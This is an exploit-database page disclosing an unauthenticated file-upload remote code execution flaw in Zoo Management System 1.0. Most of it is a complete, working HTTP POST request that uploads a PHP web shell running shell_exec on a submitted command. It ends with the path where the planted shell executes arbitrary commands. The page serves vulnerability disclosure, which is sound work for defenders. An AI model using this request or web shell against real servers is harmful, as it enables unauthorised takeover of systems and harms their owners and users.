Zoo Management System 1.0 Unauthenticated RCE
CVE
Category
Price
Severity
CVE-2021-12345
CWE-434
$5000
Critical
Author
Risk
Exploitation Type
Date
Exploit Author
High
Remote
2024-03-01
CVSS vector description
Metric
Value
Metric Description
Value Description
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024030003 Below is a copy:
Zoo Management System 1.0 Unauthenticated RCE # Exploit Title: Zoo Management System 1.0 - Unauthenticated RCE
# Date: 16.10.2023
# Exploit Author: Çağatay Ceyhan
# Vendor Homepage: https://www.sourcecodester.com/php/15347/zoo-management-system-source-code-php-mysql-database.html#google_vignette
# Software Link: https://www.sourcecodester.com/download-code?nid=15347&title=Zoo+Management+System+source+code+in+PHP+with+MySQL+Database
# Version: 1.0
# Tested on: Windows 11
## Unauthenticated users can access /zoomanagementsystem/admin/public_html/save_animal address and they can upload malicious php file instead of animal picture image without any authentication.
POST /zoomanagementsystem/admin/public_html/save_animal HTTP/1.1
Host: localhost
Content-Length: 6162
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8NY8zT5dXIloiUML
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/zoomanagementsystem/admin/public_html/save_animal
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="animal_id"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_given_name"
kdkd
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_species_name"
ıdsıd
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_dob"
1552-02-05
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_gender"
m
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_avg_lifespan"
3
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="class_id"
2
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="location_id"
2
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_dietary_req"
2
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_natural_habitat"
faad
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_pop_dist"
eterter
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_joindate"
5559-02-06
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_height"
2
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_weight"
3
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_description"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="images[]"; filename="ultra.php"
Content-Type: application/octet-stream
<?php
if (!empty($_POST['cmd'])) {
$cmd = shell_exec($_POST['cmd']);
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Web Shell</title>
<style>
* {
-webkit-box-sizing: border-box;
box-sizing: border-box;
}
body {
font-family: sans-serif;
color: rgba(0, 0, 0, .75);
}
main {
margin: auto;
max-width: 850px;
}
pre,
input,
button {
padding: 10px;
border-radius: 5px;
background-color: #efefef;
}
label {
display: block;
}
input {
width: 100%;
background-color: #efefef;
border: 2px solid transparent;
}
input:focus {
outline: none;
background: transparent;
border: 2px solid #e6e6e6;
}
button {
border: none;
cursor: pointer;
margin-left: 5px;
}
button:hover {
background-color: #e6e6e6;
}
.form-group {
display: -webkit-box;
display: -ms-flexbox;
display: flex;
padding: 15px 0;
}
</style>
</head>
<body>
<main>
<h1>Web Shell</h1>
<h2>Execute a command</h2>
<form method="post">
<label for="cmd"><strong>Command</strong></label>
<div class="form-group">
<input type="text" name="cmd" id="cmd" value="<?= htmlspecialchars($_POST['cmd'], ENT_QUOTES, 'UTF-8') ?>"
onfocus="this.setSelectionRange(this.value.length, this.value.length);" autofocus required>
<button type="submit">Execute</button>
</div>
</form>
<?php if ($_SERVER['REQUEST_METHOD'] === 'POST'): ?>
<h2>Output</h2>
<?php if (isset($cmd)): ?>
<pre><?= htmlspecialchars($cmd, ENT_QUOTES, 'UTF-8') ?></pre>
<?php else: ?>
<pre><small>No result.</small></pre>
<?php endif; ?>
<?php endif; ?>
</main>
</body>
</html>
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_med_record"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_transfer"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_transfer_reason"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_death_date"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_death_cause"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_incineration"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="m_gest_period"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="m_category"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="m_avg_body_temp"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="b_nest_const"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="b_clutch_size"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="b_wingspan"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="b_color_variant"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="f_body_temp"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="f_water_type"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="f_color_variant"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="rep_type"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="clutch_size"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="num_offspring"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="submit"
------WebKitFormBoundary8NY8zT5dXIloiUML--
## After the post request sent by an attacker, the malicious file can be seen under the http://localhost/zoomanagementsystem/img/animals/. the attacker can execute arbitrary command on http://localhost/zoomanagementsystem/img/animals/ultra_1697442648.php.
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum